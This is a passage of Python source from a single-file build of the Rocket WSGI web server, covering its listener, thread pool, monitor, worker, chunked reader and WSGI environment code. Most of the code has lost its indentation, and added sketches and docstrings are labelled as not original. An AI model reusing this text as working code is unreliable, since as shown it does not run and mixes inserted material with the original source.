return self.conn.recv(size)
except socket.error:
exc = sys.exc_info()
e = exc[1]
# FIXME - Don't raise socket_errors_nonblocking or socket_error_eintr
if (e.args[0] not in set()):
raise
def next(self):
data = self.readline()
if data == '':
raise StopIteration
return data
def non_blocking_read(self, size=None):
# Shamelessly adapted from Cherrypy!
bufr = self.buffer
bufr.seek(0, 2)
if size is None:
while True:
data = self.recv(self.buf_size)
if not data:
break
bufr.write(data)
self.buffer = StringIO()
return bufr.getvalue()
else:
buf_len = self.buffer.tell()
if buf_len >= size:
bufr.seek(0)
data = bufr.read(size)
self.buffer = StringIO(bufr.read())
return data
self.buffer = StringIO()
while True:
remaining = size - buf_len
data = self.recv(remaining)
if not data:
break
n = len(data)
if n == size and not buf_len:
return data
if n == remaining:
bufr.write(data)
del data
break
bufr.write(data)
buf_len += n
del data
return bufr.getvalue()
def blocking_read(self, length=None):
if length is None:
if self.content_length is not None:
length = self.content_length
else:
length = 1
try:
data = self.conn.recv(length)
except:
data = b('')
return data
def readline(self):
data = b("")
char = self.read(1)
while char != b('\n') and char != b(''):
data += char
char = self.read(1)
data += char
return data
def readlines(self, hint="ignored"):
return list(self)
def close(self):
self.conn = None
self.content_length = None
# Monolithic build...end of module: rocket/filelike.py
# Monolithic build...start of module: rocket/futures.py
# Import System Modules
import time
try:
from concurrent.futures import Future, ThreadPoolExecutor
from concurrent.futures.thread import _WorkItem
has_futures = True
except ImportError:
has_futures = False
class Future:
pass
class ThreadPoolExecutor:
pass
class _WorkItem:
pass
class WSGIFuture(Future):
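"""Future that can be remembered by name in a shared dictionary and that
cancels itself if it has not started within its lifespan (30 seconds by
default). (Added summary, inferred from the code below.)"""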
def __init__(self, f_dict, *args, **kwargs):
Future.__init__(self, *args, **kwargs)
self.timeout = None
self._mem_dict = f_dict
self._lifespan = 30
self._name = None
self._start_time = time.time()
def set_running_or_notify_cancel(self):
if time.time() - self._start_time >= self._lifespan:
self.cancel()
else:
return super(WSGIFuture, self).set_running_or_notify_cancel()
def remember(self, name, lifespan=None):
self._lifespan = lifespan or self._lifespan
if name in self._mem_dict:
raise NameError('Cannot remember future by name "%s". ' % name +
'A future already exists with that name.')
self._name = name
self._mem_dict[name] = self
return self
def forget(self):
if self._name in self._mem_dict and self._mem_dict[self._name] is self:
del self._mem_dict[self._name]
self._name = None
class _WorkItem(object):
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class WSGIExecutor(ThreadPoolExecutor):
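"""ThreadPoolExecutor variant that creates WSGIFuture objects and tracks
them in self.futures so a WSGI application can retrieve them later by
name. (Added summary, inferred from the code below.)"""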
multithread = True
multiprocess = False
def __init__(self, *args, **kwargs):
ThreadPoolExecutor.__init__(self, *args, **kwargs)
self.futures = dict()
def submit(self, fn, *args, **kwargs):
if self._shutdown_lock.acquire():
if self._shutdown:
self._shutdown_lock.release()
raise RuntimeError(
'Cannot schedule new futures after shutdown')
f = WSGIFuture(self.futures)
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._shutdown_lock.release()
return f
else:
return False
class FuturesMiddleware(object):
"Futures middleware that adds a Futures Executor to the environment"
def __init__(self, app, threads=5):
self.app = app
self.executor = WSGIExecutor(threads)
def __call__(self, environ, start_response):
environ["wsgiorg.executor"] = self.executor
environ["wsgiorg.futures"] = self.executor.futures
return self.app(environ, start_response)
# Monolithic build...end of module: rocket/futures.py
# Monolithic build...start of module: rocket/listener.py
# Import System Modules
import os
import socket
import logging
import traceback
from threading import Thread
try:
import ssl
from ssl import SSLError
has_ssl = True
except ImportError:
has_ssl = False
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
class Listener(Thread):
"""The Listener class is a class responsible for accepting connections
and queuing them to be processed by a worker thread."""
def __init__(self, interface, queue_size, active_queue, *args, **kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance variables
self.active_queue = active_queue
self.interface = interface
self.addr = interface[0]
self.port = interface[1]
self.secure = len(interface) >= 4
self.clientcert_req = (len(interface) == 5 and interface[4])
self.thread = None
self.ready = False
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.Port%i' % self.port)
self.err_log.addHandler(NullHandler())
# Build the socket
if ':' in self.addr:
listener = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not listener:
self.err_log.error("Failed to get socket.")
return
if self.secure:
if not has_ssl:
self.err_log.error("ssl module required to serve HTTPS.")
return
elif not os.path.exists(interface[2]):
data = (interface[2], interface[0], interface[1])
self.err_log.error("Cannot find key file "
"'%s'. Cannot bind to %s:%s" % data)
return
elif not os.path.exists(interface[3]):
data = (interface[3], interface[0], interface[1])
self.err_log.error("Cannot find certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
if self.clientcert_req and not os.path.exists(interface[4]):
data = (interface[4], interface[0], interface[1])
self.err_log.error("Cannot find root ca certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
# Set socket options
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except:
msg = "Cannot share socket. Using %s:%i exclusively."
self.err_log.warning(msg % (self.addr, self.port))
try:
if not IS_JYTHON:
listener.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY,
1)
except:
msg = "Cannot set TCP_NODELAY, things might run a little slower"
self.err_log.warning(msg)
try:
listener.bind((self.addr, self.port))
except:
msg = "Socket %s:%i in use by other process and it won't share."
self.err_log.error(msg % (self.addr, self.port))
else:
# We want socket operations to timeout periodically so we can
# check if the server is shutting down
listener.settimeout(THREAD_STOP_CHECK_INTERVAL)
# Listen for new connections allowing queue_size number of
# connections to wait before rejecting a connection.
listener.listen(queue_size)
self.listener = listener
self.ready = True
def wrap_socket(self, sock):
try:
if self.clientcert_req:
ca_certs = self.interface[4]
cert_reqs = ssl.CERT_OPTIONAL
sock = ssl.wrap_socket(sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
ssl_version=ssl.PROTOCOL_SSLv23)
else:
sock = ssl.wrap_socket(sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
ssl_version=ssl.PROTOCOL_SSLv23)
except SSLError:
# Generally this happens when an HTTP request is received on a
# secure socket. We don't do anything because it will be detected
# by Worker and dealt with appropriately.
pass
return sock
def start(self):
if not self.ready:
self.err_log.warning('Listener started when not ready.')
return
if self.thread is not None and self.thread.isAlive():
self.err_log.warning('Listener already running.')
return
self.thread = Thread(target=self.listen, name="Port" + str(self.port))
self.thread.start()
def isAlive(self):
if self.thread is None:
return False
return self.thread.isAlive()
def join(self):
if self.thread is None:
return
self.ready = False
self.thread.join()
del self.thread
self.thread = None
self.ready = True
def listen(self):
if __debug__:
self.err_log.debug('Entering main loop.')
while True:
try:
sock, addr = self.listener.accept()
if self.secure:
sock = self.wrap_socket(sock)
self.active_queue.put(((sock, addr),
self.interface[1],
self.secure))
except socket.timeout:
# socket.timeout will be raised every
# THREAD_STOP_CHECK_INTERVAL seconds. When that happens,
# we check if it's time to die.
if not self.ready:
if __debug__:
self.err_log.debug('Listener exiting.')
return
else:
continue
except:
self.err_log.error(traceback.format_exc())
# Monolithic build...end of module: rocket/listener.py
# Monolithic build...start of module: rocket/main.py
# Import System Modules
import sys
import time
import socket
import logging
import traceback
from threading import Lock
try:
from queue import Queue
except ImportError:
from Queue import Queue
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket')
log.addHandler(NullHandler())
class Rocket(object):
"""The Rocket class is responsible for handling threads and accepting and
dispatching connections."""
def __init__(self,
interfaces=('127.0.0.1', 8000),
method='wsgi',
app_info=None,
min_threads=None,
max_threads=None,
queue_size=None,
timeout=600,
handle_signals=True):
self.handle_signals = handle_signals
self.startstop_lock = Lock()
self.timeout = timeout
if not isinstance(interfaces, list):
self.interfaces = [interfaces]
else:
self.interfaces = interfaces
if min_threads is None:
min_threads = DEFAULTS['MIN_THREADS']
if max_threads is None:
max_threads = DEFAULTS['MAX_THREADS']
if not queue_size:
if hasattr(socket, 'SOMAXCONN'):
queue_size = socket.SOMAXCONN
else:
queue_size = DEFAULTS['LISTEN_QUEUE_SIZE']
if max_threads and queue_size > max_threads:
queue_size = max_threads
if isinstance(app_info, dict):
app_info['server_software'] = SERVER_SOFTWARE
self.monitor_queue = Queue()
self.active_queue = Queue()
self._threadpool = ThreadPool(get_method(method),
app_info=app_info,
active_queue=self.active_queue,
monitor_queue=self.monitor_queue,
min_threads=min_threads,
max_threads=max_threads)
# Build our socket listeners
self.listeners = [Listener(
i, queue_size, self.active_queue) for i in self.interfaces]
for ndx in range(len(self.listeners) - 1, 0, -1):
if not self.listeners[ndx].ready:
del self.listeners[ndx]
if not self.listeners:
log.critical("No interfaces to listen on...closing.")
sys.exit(1)
def _sigterm(self, signum, frame):
log.info('Received SIGTERM')
self.stop()
def _sighup(self, signum, frame):
log.info('Received SIGHUP')
self.restart()
def start(self, background=False):
log.info('Starting %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Set up our shutdown signals
if self.handle_signals:
try:
import signal
signal.signal(signal.SIGTERM, self._sigterm)
signal.signal(signal.SIGUSR1, self._sighup)
except:
log.debug('This platform does not support signals.')
# Start our worker threads
self._threadpool.start()
# Start our monitor thread
self._monitor = Monitor(self.monitor_queue,
self.active_queue,
self.timeout,
self._threadpool)
self._monitor.setDaemon(True)
self._monitor.start()
# I know that EXPR and A or B is bad but I'm keeping it for Py2.4
# compatibility.
str_extract = lambda l: (l.addr, l.port, l.secure and '*' or '')
msg = 'Listening on sockets: '
msg += ', '.join(
['%s:%i%s' % str_extract(l) for l in self.listeners])
log.info(msg)
for l in self.listeners:
l.start()
finally:
self.startstop_lock.release()
if background:
return
while self._monitor.isAlive():
try:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
except KeyboardInterrupt:
# Capture a keyboard interrupt when running from a console
break
except:
if self._monitor.isAlive():
log.error(traceback.format_exc())
continue
return self.stop()
def stop(self, stoplogging=False):
log.info('Stopping %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Stop listeners
for l in self.listeners:
l.ready = False
# Encourage a context switch
time.sleep(0.01)
for l in self.listeners:
if l.isAlive():
l.join()
# Stop Monitor
self._monitor.stop()
if self._monitor.isAlive():
self._monitor.join()
# Stop Worker threads
self._threadpool.stop()
if stoplogging:
logging.shutdown()
msg = "Calling logging.shutdown() is now the responsibility of \
the application developer. Please update your \
applications to no longer call rocket.stop(True)"
try:
import warnings
raise warnings.DeprecationWarning(msg)
except ImportError:
raise RuntimeError(msg)
finally:
self.startstop_lock.release()
def restart(self):
self.stop()
self.start()
def CherryPyWSGIServer(bind_addr,
wsgi_app,
numthreads=10,
server_name=None,
max=-1,
request_queue_size=5,
timeout=10,
shutdown_timeout=5):
""" A Cherrypy wsgiserver-compatible wrapper. """
max_threads = max
if max_threads < 0:
max_threads = 0
return Rocket(bind_addr, 'wsgi', {'wsgi_app': wsgi_app},
min_threads=numthreads,
max_threads=max_threads,
queue_size=request_queue_size,
timeout=timeout)
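# Illustrative sketch (not part of the original Rocket source): serving a minimal
# WSGI app with Rocket.  Wrapped in a function so that importing this monolithic
# module does not start a server.
def _example_serve_rocket():
    def hello_app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return [b'Hello from Rocket']
    server = Rocket(interfaces=('127.0.0.1', 8000),
                    method='wsgi',
                    app_info={'wsgi_app': hello_app})
    # start() blocks until interrupted; pass background=True to return immediately.
    server.start()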
# Monolithic build...end of module: rocket/main.py
# Monolithic build...start of module: rocket/monitor.py
# Import System Modules
import time
import logging
import select
from threading import Thread
# Import Package Modules
# package imports removed in monolithic build
class Monitor(Thread):
# Monitor worker class.
def __init__(self,
monitor_queue,
active_queue,
timeout,
threadpool,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
self._threadpool = threadpool
# Instance Variables
self.monitor_queue = monitor_queue
self.active_queue = active_queue
self.timeout = timeout
self.log = logging.getLogger('Rocket.Monitor')
self.log.addHandler(NullHandler())
self.connections = set()
self.active = False
def run(self):
self.active = True
conn_list = list()
list_changed = False
# We need to make sure the queue is empty before we start
while not self.monitor_queue.empty():
self.monitor_queue.get()
if __debug__:
self.log.debug('Entering monitor loop.')
# Enter thread main loop
while self.active:
# Move the queued connections to the selection pool
while not self.monitor_queue.empty():
if __debug__:
self.log.debug('In "receive timed-out connections" loop.')
c = self.monitor_queue.get()
if c is None:
# A non-client is a signal to die
if __debug__:
self.log.debug('Received a death threat.')
self.stop()
break
self.log.debug('Received a timed out connection.')
if __debug__:
assert(c not in self.connections)
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it.
c.setblocking(False)
if __debug__:
self.log.debug('Adding connection to monitor list.')
self.connections.add(c)
list_changed = True
# Wait on those connections
if list_changed:
conn_list = list(self.connections)
list_changed = False
try:
if len(conn_list):
readable = select.select(conn_list,
[],
[],
THREAD_STOP_CHECK_INTERVAL)[0]
else:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
readable = []
if not self.active:
break
# If we have any readable connections, put them back
for r in readable:
if __debug__:
self.log.debug('Restoring readable connection')
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it, but the rest of the code requires
# that it be in blocking mode.
r.setblocking(True)
r.start_time = time.time()
self.active_queue.put(r)
self.connections.remove(r)
list_changed = True
except:
if self.active:
raise
else:
break
# If we have any stale connections, kill them off.
if self.timeout:
now = time.time()
stale = set()
for c in self.connections:
if (now - c.start_time) >= self.timeout:
stale.add(c)
for c in stale:
if __debug__:
# "EXPR and A or B" kept for Py2.4 compatibility
data = (
c.client_addr, c.server_port, c.ssl and '*' or '')
self.log.debug(
'Flushing stale connection: %s:%i%s' % data)
self.connections.remove(c)
list_changed = True
try:
c.close()
finally:
del c
# Dynamically resize the threadpool to adapt to our changing needs.
self._threadpool.dynamic_resize()
def stop(self):
self.active = False
if __debug__:
self.log.debug('Flushing waiting connections')
while self.connections:
c = self.connections.pop()
try:
c.close()
finally:
del c
if __debug__:
self.log.debug('Flushing queued connections')
while not self.monitor_queue.empty():
c = self.monitor_queue.get()
if c is None:
continue
try:
c.close()
finally:
del c
# Place a None sentry value to cause the monitor to die.
self.monitor_queue.put(None)
# Monolithic build...end of module: rocket/monitor.py
# Monolithic build...start of module: rocket/threadpool.py
# Import System Modules
import logging
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket.Errors.ThreadPool')
log.addHandler(NullHandler())
class ThreadPool:
"""The ThreadPool class is a container class for all the worker threads. It
manages the number of actively running threads."""
def __init__(self,
method,
app_info,
active_queue,
monitor_queue,
min_threads=DEFAULTS['MIN_THREADS'],
max_threads=DEFAULTS['MAX_THREADS'],
):
if __debug__:
log.debug("Initializing ThreadPool.")
self.check_for_dead_threads = 0
self.active_queue = active_queue
self.worker_class = method
self.min_threads = min_threads
self.max_threads = max_threads
self.monitor_queue = monitor_queue
self.stop_server = False
self.alive = False
# TODO - Optimize this based on some real-world usage data
self.grow_threshold = int(max_threads / 10) + 2
if not isinstance(app_info, dict):
app_info = dict()
if has_futures and app_info.get('futures'):
app_info['executor'] = WSGIExecutor(max([DEFAULTS['MIN_THREADS'],
2]))
app_info.update(max_threads=max_threads,
min_threads=min_threads)
self.min_threads = min_threads
self.app_info = app_info
self.threads = set()
def start(self):
self.stop_server = False
if __debug__:
log.debug("Starting threads.")
self.grow(self.min_threads)
self.alive = True
def stop(self):
self.alive = False
if __debug__:
log.debug("Stopping threads.")
self.stop_server = True
# Prompt the threads to die
self.shrink(len(self.threads))
# Stop futures initially
if has_futures and self.app_info.get('futures'):
if __debug__:
log.debug("Future executor is present. Python will not "
"exit until all jobs have finished.")
self.app_info['executor'].shutdown(wait=False)
# Give them the gun
#active_threads = [t for t in self.threads if t.isAlive()]
#while active_threads:
# t = active_threads.pop()
# t.kill()
# Wait until they pull the trigger
for t in self.threads:
if t.isAlive():
t.join()
# Clean up the mess
self.bring_out_your_dead()
def bring_out_your_dead(self):
# Remove dead threads from the pool
dead_threads = [t for t in self.threads if not t.isAlive()]
for t in dead_threads:
if __debug__:
log.debug("Removing dead thread: %s." % t.getName())
try:
# Py2.4 complains here so we put it in a try block
self.threads.remove(t)
except:
pass
self.check_for_dead_threads -= len(dead_threads)
def grow(self, amount=None):
if self.stop_server:
return
if not amount:
amount = self.max_threads
if self.alive:
amount = min([amount, self.max_threads - len(self.threads)])
if __debug__:
log.debug("Growing by %i." % amount)
for x in range(amount):
worker = self.worker_class(self.app_info,
self.active_queue,
self.monitor_queue)
worker.setDaemon(True)
self.threads.add(worker)
worker.start()
def shrink(self, amount=1):
if __debug__:
log.debug("Shrinking by %i." % amount)
self.check_for_dead_threads += amount
for x in range(amount):
self.active_queue.put(None)
def dynamic_resize(self):
if (self.max_threads > self.min_threads or self.max_threads == 0):
if self.check_for_dead_threads > 0:
self.bring_out_your_dead()
queueSize = self.active_queue.qsize()
threadCount = len(self.threads)
if __debug__:
                log.debug("Examining ThreadPool. %i threads and %i queued connections"
% (threadCount, queueSize))
if queueSize == 0 and threadCount > self.min_threads:
self.shrink()
elif queueSize > self.grow_threshold:
self.grow(queueSize)
# Monolithic build...end of module: rocket/threadpool.py
# Monolithic build...start of module: rocket/worker.py
# Import System Modules
import re
import sys
import socket
import logging
import traceback
from wsgiref.headers import Headers
from threading import Thread
from datetime import datetime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
from ssl import SSLError
except ImportError:
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
# Define Constants
re_SLASH = re.compile('%2F', re.IGNORECASE)
re_REQUEST_LINE = re.compile(r"""^
(?P<method>OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) # Request Method
\ # (single space)
(
(?P<scheme>[^:/]+) # Scheme
(://) #
(?P<host>[^/]+) # Host
)? #
(?P<path>(\*|/[^ \?]*)) # Path
(\? (?P<query_string>[^ ]*))? # Query String
\ # (single space)
(?P<protocol>HTTPS?/1\.[01]) # Protocol
$
""", re.X)
LOG_LINE = '%(client_ip)s - "%(request_line)s" - %(status)s %(size)s'
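# Illustrative sketch (not part of the original Rocket source): the named groups
# that re_REQUEST_LINE captures for a typical request line.
def _example_request_line_groups():
    m = re_REQUEST_LINE.match('GET /index.html?x=1 HTTP/1.1')
    # -> ('GET', '/index.html', 'x=1', 'HTTP/1.1')
    return (m.group('method'), m.group('path'),
            m.group('query_string'), m.group('protocol'))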
RESPONSE = '''\
%s %s
Content-Length: %i
Content-Type: %s

%s
'''
if IS_JYTHON:
HTTP_METHODS = set(['OPTIONS', 'GET', 'HEAD', 'POST', 'PUT',
'DELETE', 'TRACE', 'CONNECT'])
class Worker(Thread):
"""The Worker class is a base class responsible for receiving connections
    and (a subclass) will run an application to process the connection."""
def __init__(self,
app_info,
active_queue,
monitor_queue,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance Variables
self.app_info = app_info
self.active_queue = active_queue
self.monitor_queue = monitor_queue
self.size = 0
self.status = "200 OK"
self.closeConnection = True
self.request_line = ""
self.protocol = 'HTTP/1.1'
# Request Log
self.req_log = logging.getLogger('Rocket.Requests')
self.req_log.addHandler(NullHandler())
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.' + self.getName())
self.err_log.addHandler(NullHandler())
def _handleError(self, typ, val, tb):
if typ == SSLError:
if 'timed out' in str(val.args[0]):
typ = SocketTimeout
if typ == SocketTimeout:
if __debug__:
self.err_log.debug('Socket timed out')
self.monitor_queue.put(self.conn)
return True
if typ == SocketClosed:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client closed socket')
return False
if typ == BadRequest:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client sent a bad request')
return True
if typ == socket.error:
self.closeConnection = True
if val.args[0] in IGNORE_ERRORS_ON_CLOSE:
if __debug__:
self.err_log.debug('Ignorable socket Error received...'
'closing connection.')
return False
else:
self.status = "999 Utter Server Failure"
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('Unhandled Error when serving '
'connection:\n' + '\n'.join(tb_fmt))
return False
self.closeConnection = True
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('\n'.join(tb_fmt))
self.send_response('500 Server Error')
return False
def run(self):
if __debug__:
self.err_log.debug('Entering main loop.')
# Enter thread main loop
while True:
conn = self.active_queue.get()
if not conn:
# A non-client is a signal to die
if __debug__:
self.err_log.debug('Received a death threat.')
return conn
if isinstance(conn, tuple):
conn = Connection(*conn)
self.conn = conn
if conn.ssl != conn.secure:
self.err_log.info('Received HTTP connection on HTTPS port.')
self.send_response('400 Bad Request')
self.closeConnection = True
conn.close()
continue
else:
if __debug__:
self.err_log.debug('Received a connection.')
self.closeConnection = False
# Enter connection serve loop
while True:
if __debug__:
self.err_log.debug('Serving a request')
try:
self.run_app(conn)
except:
exc = sys.exc_info()
handled = self._handleError(*exc)
if handled:
break
finally:
if self.request_line:
log_info = dict(client_ip=conn.client_addr,
time=datetime.now().strftime('%c'),
status=self.status.split(' ')[0],
size=self.size,
request_line=self.request_line)
self.req_log.info(LOG_LINE % log_info)
if self.closeConnection:
try:
conn.close()
except:
self.err_log.error(str(traceback.format_exc()))
break
def run_app(self, conn):
# Must be overridden with a method reads the request from the socket
# and sends a response.
self.closeConnection = True
raise NotImplementedError('Overload this method!')
def send_response(self, status):
stat_msg = status.split(' ', 1)[1]
msg = RESPONSE % (self.protocol,
status,
len(stat_msg),
'text/plain',
stat_msg)
try:
self.conn.sendall(b(msg))
except socket.timeout:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received timeout error'
self.err_log.error(msg % status)
except socket.error:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received socket error'
self.err_log.error(msg % status)
def read_request_line(self, sock_file):
self.request_line = ''
try:
# Grab the request line
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
if d == '\r\n':
# Allow an extra NEWLINE at the beginning per HTTP 1.1 spec
if __debug__:
self.err_log.debug('Client sent newline')
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
except socket.timeout:
raise SocketTimeout('Socket timed out before request.')
except TypeError:
raise SocketClosed(
'SSL bug caused closure of socket. See '
'"https://groups.google.com/d/topic/web2py/P_Gw0JxWzCs".')
d = d.strip()
if not d:
if __debug__:
self.err_log.debug(
'Client did not send a recognizable request.')
raise SocketClosed('Client closed socket.')
self.request_line = d
# NOTE: I've replaced the traditional method of procedurally breaking
# apart the request line with a (rather unsightly) regular expression.
# However, Java's regexp support sucks so bad that it actually takes
# longer in Jython to process the regexp than procedurally. So I've
# left the old code here for Jython's sake...for now.
if IS_JYTHON:
return self._read_request_line_jython(d)
match = re_REQUEST_LINE.match(d)
if not match:
self.send_response('400 Bad Request')
raise BadRequest
req = match.groupdict()
        for k, v in req.items():
if not v:
req[k] = ""
if k == 'path':
req['path'] = r'%2F'.join(
[unquote(x) for x in re_SLASH.split(v)])
self.protocol = req['protocol']
return req
def _read_request_line_jython(self, d):
d = d.strip()
try:
method, uri, proto = d.split(' ')
if not proto.startswith('HTTP') or \
proto[-3:] not in ('1.0', '1.1') or \
method not in HTTP_METHODS:
self.send_response('400 Bad Request')
raise BadRequest
except ValueError:
self.send_response('400 Bad Request')
raise BadRequest
req = dict(method=method, protocol=proto)
scheme = ''
host = ''
if uri == '*' or uri.startswith('/'):
path = uri
elif '://' in uri:
scheme, rest = uri.split('://')
host, path = rest.split('/', 1)
path = '/' + path
else:
self.send_response('400 Bad Request')
raise BadRequest
query_string = ''
if '?' in path:
path, query_string = path.split('?', 1)
path = r'%2F'.join([unquote(x) for x in re_SLASH.split(path)])
req.update(path=path,
query_string=query_string,
scheme=scheme.lower(),
host=host)
return req
def read_headers(self, sock_file):
try:
headers = dict()
lname = None
lval = None
while True:
l = sock_file.readline()
if PY3K:
try:
l = str(l, 'ISO-8859-1')
except UnicodeDecodeError:
self.err_log.warning(
'Client sent invalid header: ' + repr(l))
if l.strip().replace('\0', '') == '':
break
if l[0] in ' \t' and lname:
# Some headers take more than one line
lval += ' ' + l.strip()
else:
# HTTP header values are latin-1 encoded
l = l.split(':', 1)
# HTTP header names are us-ascii encoded
lname = l[0].strip().upper().replace('-', '_')
lval = l[-1].strip()
headers[str(lname)] = str(lval)
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
return headers
class SocketTimeout(Exception):
"Exception for when a socket times out between requests."
pass
class BadRequest(Exception):
"Exception for when a client sends an incomprehensible request."
pass
class SocketClosed(Exception):
"Exception for when a socket is closed by the client."
pass
class ChunkedReader(object):
def __init__(self, sock_file):
self.stream = sock_file
self.chunk_size = 0
def _read_header(self):
chunk_len = ""
try:
while "" == chunk_len:
chunk_len = self.stream.readline().strip()
return int(chunk_len, 16)
except ValueError:
return 0
def read(self, size):
data = b('')
chunk_size = self.chunk_size
while size:
if not chunk_size:
chunk_size = self._read_header()
if size < chunk_size:
data += self.stream.read(size)
chunk_size -= size
break
else:
if not chunk_size:
break
data += self.stream.read(chunk_size)
size -= chunk_size
chunk_size = 0
self.chunk_size = chunk_size
return data
def readline(self):
data = b('')
c = self.read(1)
while c and c != b('\n'):
data += c
c = self.read(1)
data += c
return data
def readlines(self):
yield self.readline()
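# Illustrative sketch (not part of the original Rocket source): decoding the first
# chunk of a chunked HTTP body with ChunkedReader, using an in-memory stream in
# place of the socket file object.
def _example_chunked_reader():
    from io import BytesIO
    reader = ChunkedReader(BytesIO(b'4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n'))
    return reader.read(4)   # -> b'Wiki' (the first 4-byte chunk)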
def get_method(method):
methods = dict(wsgi=WSGIWorker)
return methods[method.lower()]
# Monolithic build...end of module: rocket/worker.py
# Monolithic build...start of module: rocket/methods/__init__.py
# Monolithic build...end of module: rocket/methods/__init__.py
# Monolithic build...start of module: rocket/methods/wsgi.py
# Import System Modules
import sys
import socket
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
# Import Package Modules
# package imports removed in monolithic build
if PY3K:
from email.utils import formatdate
else:
# Caps Utils for Py2.4 compatibility
from email.Utils import formatdate
# Define Constants
NEWLINE = b('\r\n')
HEADER_RESPONSE = '''HTTP/1.1 %s\r\n%s'''
BASE_ENV = {'SERVER_NAME': SERVER_NAME,
'SCRIPT_NAME': '', # Direct call WSGI does not need a name
'wsgi.errors': sys.stderr,
'wsgi.version': (1, 0),
'wsgi.multiprocess': False,
'wsgi.run_once': False,
'wsgi.file_wrapper': FileWrapper
}
class WSGIWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
if isinstance(self.app_info, dict):
multithreaded = self.app_info.get('max_threads') != 1
else:
multithreaded = False
self.base_environ = dict(
{'SERVER_SOFTWARE': self.app_info['server_software'],
'wsgi.multithread': multithreaded,
})
self.base_environ.update(BASE_ENV)
# Grab our application
self.app = self.app_info.get('wsgi_app')
if not hasattr(self.app, "__call__"):
raise TypeError("The wsgi_app specified (%s) is not a valid WSGI application." % repr(self.app))
# Enable futures
if has_futures and self.app_info.get('futures'):
executor = self.app_info['executor']
self.base_environ.update({"wsgiorg.executor": executor,
"wsgiorg.futures": executor.futures})
def build_environ(self, sock_file, conn):
""" Build the execution environment. """
# Grab the request line
request = self.read_request_line(sock_file)
# Copy the Base Environment
environ = self.base_environ.copy()
# Grab the headers
        for k, v in self.read_headers(sock_file).items():
environ[str('HTTP_' + k)] = v
# Add CGI Variables
environ['REQUEST_METHOD'] = request['method']
environ['PATH_INFO'] = request['path']
environ['SERVER_PROTOCOL'] = request['protocol']
environ['SERVER_PORT'] = str(conn.server_port)
environ['REMOTE_PORT'] = str(conn.client_port)
environ['REMOTE_ADDR'] = str(conn.client_addr)
environ['QUERY_STRING'] = request['query_string']
if 'HTTP_CONTENT_LENGTH' in environ:
environ['CONTENT_LENGTH'] = environ['HTTP_CONTENT_LENGTH']
if 'HTTP_CONTENT_TYPE' in environ:
environ['CONTENT_TYPE'] = environ['HTTP_CONTENT_TYPE']
# Save the request method for later
self.request_method = environ['REQUEST_METHOD']
# Add Dynamic WSGI Variables
if conn.ssl:
environ['wsgi.url_scheme'] = 'https'
environ['HTTPS'] = 'on'
try:
peercert = conn.socket.getpeercert(binary_form=True)
environ['SSL_CLIENT_RAW_CERT'] = \
peercert and ssl.DER_cert_to_PEM_cert(peercert)
except Exception:
                print(sys.exc_info()[1])
else:
environ['wsgi.url_scheme'] = 'http'
if environ.get('HTTP_TRANSFER_ENCODING', '') == 'chunked':
environ['wsgi.input'] = ChunkedReader(sock_file)
else:
environ['wsgi.input'] = sock_file
return environ
def send_headers(self, data, sections):
h_set = self.header_set
# Does the app want us to send output chunked?
self.chunked = h_set.get('Transfer-Encoding', '').lower() == 'chunked'
# Add a Date header if it's not there already
if not 'Date' in h_set:
h_set['Date'] = formatdate(usegmt=True)
# Add a Server header if it's not there already
if not 'Server' in h_set:
h_set['Server'] = HTTP_SERVER_SOFTWARE
if 'Content-Length' in h_set:
self.size = int(h_set['Content-Length'])
else:
s = int(self.status.split(' ')[0])
if (s < 200 or s not in (204, 205, 304)) and not self.chunked:
if sections == 1 or self.protocol != 'HTTP/1.1':
# Add a Content-Length header because it's not there
self.size = len(data)
